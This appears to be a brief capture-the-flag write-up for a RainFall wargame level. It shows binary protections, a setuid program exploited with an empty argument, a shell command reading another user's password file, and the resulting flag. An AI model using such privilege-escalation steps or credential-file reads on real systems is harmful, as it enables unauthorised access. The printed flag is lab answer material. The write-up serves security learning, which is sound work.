After login we see next information:
```
  GCC stack protector support:            Enabled
  Strict user copy checks:                Disabled
  Restrict /dev/mem access:               Enabled
  Restrict /dev/kmem access:              Enabled
  grsecurity / PaX: No GRKERNSEC
  Kernel Heap Hardening: No KERNHEAP
 System-wide ASLR (kernel.randomize_va_space): Off (Setting: 0)
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/bonus3/bonus3
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 end users 5595 Mar  6  2016 bonus3
```

Using `objdump` and `radar` tools find out that there is one function inside - `main`.

As we can see in `source.c`, we need to put one argument `atoi` resultat of which will be used as offset to `ptr` buffer. We need to make `ptr` and `argv[1]` equal. Solution is to put empty argument )))


Exploit:
```
bonus3@RainFall:~$ ./bonus3 ""
$ cat /home/user/end/.pass
3321b6f81659f9a71c76616f606e4b50189cecfea611393d5d649f75e157353c
```

Flag: `3321b6f81659f9a71c76616f606e4b50189cecfea611393d5d649f75e157353c`